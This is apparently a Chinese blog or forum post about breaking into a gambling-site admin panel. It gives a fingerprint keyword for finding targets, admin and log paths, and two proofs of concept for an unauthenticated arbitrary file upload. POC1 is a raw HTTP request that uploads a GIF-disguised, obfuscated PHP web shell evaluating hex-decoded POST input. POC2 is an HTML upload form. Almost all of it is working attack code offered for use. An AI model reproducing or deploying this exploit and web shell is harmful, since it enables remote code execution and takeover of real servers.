某BC

lufei 297 次浏览 0

关键词:"/admin/resources/ui/DD_belatedPNG_0.0.8a-min.js"

/admin/Uploads.upload.do
/Admincenter/Public.login.do
/admin888/admincenter/public.login.do
/Runtime/Logs/Admincenter/19_05_31.log
/Uploads/   string(2) ".."  修复

POC1

POST /admin/Uploads.upload.do?allowext=php HTTP/1.1
Host: xxx
Content-Length: 746
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuIWTW3RsZ51ya6Sx
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ahc7elein6qs1rll0c4tf91tt0; admin_think_template=admin
Connection: close

------WebKitFormBoundaryuIWTW3RsZ51ya6Sx
Content-Disposition: form-data; name="imgFile"; filename="info.php"
Content-Type: application/octet-stream

GIF89a
<?php
class _
{
    static public $phpcms=Null;
    function __construct($l="error"){
        self::$phpcms=$l;
        @eval/*Defining error level offences*/(null.null.self::$phpcms);
    }
}
function hexToStr($hex){   
        $str=""; 
        for($i=0;$i<strlen($hex)-1;$i+=2)
        $str.=chr(hexdec($hex[$i].$hex[$i+1]));
        return  $str;
    } 
$error = null.hexToStr(@$_POST/*\*/["1"]);
$d = new _($error);
?>
------WebKitFormBoundaryuIWTW3RsZ51ya6Sx
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryuIWTW3RsZ51ya6Sx--

POC2

<html>
<body>
<form action="/admin/Uploads.upload.do?allowext=php" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>


<input type="file" name="imgFile"/>  



<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>

发表评论 取消回复
表情